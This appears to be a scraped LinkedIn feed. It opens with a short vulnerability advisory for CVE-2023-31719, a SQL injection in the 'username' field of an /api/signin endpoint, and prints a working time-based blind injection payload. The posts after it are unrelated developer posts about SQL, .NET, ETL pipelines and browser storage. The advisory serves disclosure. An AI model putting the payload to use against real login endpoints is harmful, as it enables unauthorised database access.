API ThreatStats
1,032 followers
- Report this post
High CVE-2023-31719: f*ckA SQL Injection VulnerabilityIts possible do inject SQL code into the JSON parameter "username" from the endpoint /api/signin via HTTP POST request{"username":"test' OR 2891=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2))))-- ZJMj","password":"test"}CVSSv3.1 Base Score: 8.2https://lnkd.in/dmSyEjyT
7
To view or add a comment, sign in
More Relevant Posts
-
Hussein Elghareb
Jr .Net Backend Developer @Ertaqy | DEPI Trainee
- Report this post
#100DayOfDotNet#Day31 #Day32 #Day33🔹How to send extra data go the view🔹ViewData, ViewBag🔹ViewModel🔹When to use ViewModel🔹State management🔸🔸session, TempData, Cookie🔹TempData methods🔸🔸Load, Save, Keep, Peek🔹TempData lifeTime🔹Session Variables🔹Setting Time to the session 🔹Cookie🔹Cookie type🔸🔸Session, Persistent CookiesGitHub Repo: [https://lnkd.in/djch5F_G]#Csharp#OOP#Database#MicosoftSQLServer#SQLServer#LINQ#WinForms#DevExpress#ORM#ADO#Dapper #EntityFrameworkCore #ASPDotNetMVCCore #MVC#DotNet#ASP.Net#SelfStudy
41
1 Comment
Like CommentTo view or add a comment, sign in
-
Akash Christopher
Data Insights Professional | Python, SQL, Power BI, Azure Data Engineering | Proven Experience in BI & Analytics Development, Data Integration, and Data Science | Microsoft Fabric
- Report this post
Start with these building blocks to revisit and practice SQL Essentials!•DDL (Data Definition Language)oCREATE TableoALTER TableoDROP TableoTRUNCATE Table•DML (Data Manipulation Language)oINSERToUPDATEoDELETE•DCL (Data Control Language)oGRANToREVOKE•TCL (Transaction Control Language)oCOMMIToROLLBACKoSAVEPOINT•DQL (Data Query Language)oSELECT•Different SELECT Query FunctionalitiesoSQL OperatorsLogical OperatorsComparison OperatorsArithmetic OperatorsoCASE StatementoTwo ways of writing SQL QueriesUsing comma separatorUsing JOINoUNION & UNION ALL OperatorsoGROUP BY StatementHAVING ClauseoSubqueryoAggregate FunctionsCOUNTAVGMINMAXSUM•SQL JOINSoINNER JOINoOUTER JOINLEFT OUTER JOINRIGHT OUTER JOINFULL OUTER JOINRevisiting and practicing these essential SQL concepts to strengthen my skills! Check out my practice queries on GitHub: https://lnkd.in/gBjv7ZGa #SQL #DatabaseManagement#SQL #DatabaseManagement
6
Like CommentTo view or add a comment, sign in
-
Mohamed Eldeeb
Data Engineer & ML enthusiast
- Report this post
My first ETL data pipeline for extracting financial data from various sources like websites, APIs, and files provided by various financial analysis firms. After collecting the data, we extracted the data of interest and transformed it based on the given requirements. Once the transformation is completed we load that data into a single CSV file.Project Tasks:- Collecting data using Exchange Rate-API by making HTTP requests to some of the API endpoints.- Collecting data using web scraping by parsing HTML code using BeautifulSoup.- Download and save these collected data into different files to be processed.- Read/pars CSV, XML, and JSON file types.- Extract data from these file types.- Transform data based on given requirements.- Load/Save the transformed data in a ready-to-load format.- Build a logging module that saves logging info into a `logs.txt` file.
34
12 Comments
Like CommentTo view or add a comment, sign in
-
Abhishek Kumar
Full Stack Developer (Reactjs, Node Js, Express, MongoDB)
- Report this post
🚫🛑 Stop Using localStorage! 🛑🚫👋 Folks, no clickbait here – just a straightforward message: "Stop Using localStorage!" It's outdated for modern apps. Let's break it down. ⏬🔵 localStorage's Origin (2009)Introduced as a 5MB string-based storage.Never meant as the end-all solution for browser storage.🔵 Issues with localStorage:One Data Type: Only stores strings. Complex data? Serialize and deserialize.Slow Performance: Not ideal for apps needing quick data transactions.Limited Space: Max 5MB storage.Serialization Troubles: Easy to introduce bugs, especially for new devs.Blocking Operations: Slows down your app. No async support – a big no for smooth mobile experiences.🔵 The Fall of WebSQLA simple SQL database for the web.Dropped due to single-vendor implementation, no W3C standardization, competition with IndexedDB, and security concerns.🔵 Cookies' LimitationsCreated in 1994, they're ancient!Only 4KB per domain, sent with every HTTP request, security risks, expiration issues, and increase latency.🔵 Why IndexedDB?Performance: Async operations = no blocking.More Space: Much larger storage quota than localStorage.Reliability: Avoids common data issues and uses structuredClone algorithm for integrity.🔵 But, IndexedDB Isn't Perfect...Not user-friendly.Most libraries focus on versioning, which you might not need.🔵 Solution: db64 LibraryFocuses on IndexedDB's essential features.Avoids bloat from oversized libraries.Check it out here: db64 Libraryhttps://lnkd.in/dMGWn34X🔵 ConclusionlocalStorage is outdated.IndexedDB offers speed, reliability, and flexibility, especially with wrapper libraries.#webdevelopment #javascript #IndexedDB #storagesolutions
1
Like CommentTo view or add a comment, sign in
-
Stephen Curran
Astrophysicist | Data Analyst | Data Scientist | Research Project Leader | Team Leader | Researcher | Teacher | Public Speaker | Science Communicator | Scientific Consultant
- Report this post
Here's a shell script to convert an SQL file to CSVs (one for each table). Especially useful when running into errors like "Parse error: file is not a database" and not wanting to take out an online subscription.https://lnkd.in/gHsPspxx
2
Like CommentTo view or add a comment, sign in
-
Ajai S
| Fresher | Looking for Data Analyst jobs with experience in | Databricks | PySpark | AWS services like S3 |Hadoop and Spark .
- Report this post
#dataengineering 1. READING AND WRITING DIFFERENT FILE FORMATS Databricks can read data from and write data to a variety of data formats such as CSV, JSON, Parquet, avro , xlsx(excel format). So in this Notebook we are going to see how to read and write these formats.Some of the common file formats used.CSV FILE FORMAT Comma-separated values (CSV) is a text file format that uses commas to separate values. A CSV file stores tabular data (numbers and text) in plain text, where each line of the file typically represents one data record. Each record consists of the same number of fields, and these are separated by commas in the CSV file.JSON FILE FORMAT JavaScript Object Notation (JSON) is a standard text-based format for representing structured data based on JavaScript object syntax. It is commonly used for transmitting data in web applications (e.g., sending some data from the server to the client, so it can be displayed on a web page, or vice versa).PARQUET FILE FORMAT Parquet is an open source, column-oriented data file format designed for efficient data storage and retrieval. It provides efficient data compression and encoding schemes with enhanced performance to handle complex data in bulkAvro File Format Avro stores the data definition in JSON format making it easy to read and interpret; the data itself is stored in binary format making it compact and efficient. Avro files include markers that can be used to split large data sets into subsets suitable for Apache MapReduce processing.Link - https://lnkd.in/dfChk4FWLink - https://lnkd.in/guF6XT3j#databricks #spark #pyspark #python #mysql #parquet #json #csv #jobsearch #github #jobseeker #jobhunting #hireme #careers
Like CommentTo view or add a comment, sign in
-
Abdulwaisa Al Nuaimi
Software Developer | Junior .NET Developer | Full Stack Developer
- Report this post
GenericController.Apiis an extensible ASP.NET Core Web API designed to streamline the implementation of CRUD operations for various entities. This project leverages a generic repository pattern and base controller, minimizing boilerplate code and enhancing code reuse. It's ideal for developers seeking a robust and maintainable architecture for managing different types of data models. https://lnkd.in/dMDwCr5E
3
3 Comments
Like CommentTo view or add a comment, sign in
-
Julio Cabanillas
Junior Software Developer
- Report this post
🚀 Exciting News! 🚀I've just released a new GitHub repository for a NodeJS-based web crawler that generates newsletters using SendGrid and OpenAI APIs. This tool is perfect for anyone looking to automate their news updates and stay informed with the latest trends via web crawling.Check it out here: https://lnkd.in/dsDnYGrBWhether you're into tech, security, or just curious, this project is for you. Contributions and feedback are welcome!#webscraping #webcrawling #newsletter #NodeJS #OpenAI #SendGrid
7
Like CommentTo view or add a comment, sign in
-
Omar Ahmed
HIS Implementer @Millensys | ITI Graduate.
- Report this post
🚀 Thrilled to unveil our latest project: Bash Shell Script DBMS 📊Adham Ayman and I have worked together to develop a command-line interface (CLI) based app that empowers users to efficiently store and retrieve data from their hard disks. 🖥️Key Features:🔍 CLI Menu for user-friendly navigation✨ Main Menu options: Create, List, Connect, and Drop Databases💽 Submenu for specific database operations: Create, List, Drop Tables, and moreThis project not only enhances data management but also provides a seamless user experience. 💡What it offers:📂 Create Database: Set up your data repository📋 List Databases: Easily track your databases🔗 Connect to Databases: Seamless transition to specific databases❌ Drop Database: Efficient database removalAnd, when connected to a specific database:🗄️ Create/List/Drop Table: Manage your tables effortlessly📥 Insert/Select/Delete/Update Table: Fine-tune your data operationsBig shoutout to @AdhamAyman for the fantastic collaboration! Excited about the potential applications and looking forward to your thoughts! Feel free to reach out for more details or a demo. 👩💻👨💻#DatabaseManagement #ShellScripting #TechInnovation #CLIApp #DataManagementhttps://lnkd.in/dwnjuxK2
17
16 Comments
Like CommentTo view or add a comment, sign in
-
Rob Horrocks
SQL Server and Azure SME helping organisations develop and optimise their estate on any platform (On-prem, Cloud, Windows, Linux, K8s) - Former Senior PFE and CSA at Microsoft
- Report this post
Here is an Extended Events loader with a difference. At the moment it is only used to load rpc_completed and sql_batch_completed events into a SQL Server Database. However, it will then hash unique batches and generate statistics for them based on Duration, CPU, Logical Reads, Physical Reads, Writes and Rowcount.Use this tool to load events for a specific time range (e.g. hour, day, week). You can filter to get the exact Start and End date/time, and you can filter out noisy sp_reset_connection stored procedure calls.There is a SQL Query and Excel report template to compare the CPU used by all, or a subset of your stored procedures, against a screenshot of the OS and SQL CPU metrics. You can also compare against Query Store Runtime Stats to give an idea of compilation time and client duration.You can also review the following stats for your batches.Min, Mean, Median, Max and Total1st and 3rd Quartile90th, 95th and 99th Percentilehttps://lnkd.in/e9W5sjJf
2
Like CommentTo view or add a comment, sign in
1,032 followers
View Profile
FollowExplore topics
- Sales
- Marketing
- IT Services
- Business Administration
- HR Management
- Engineering
- Soft Skills
- See All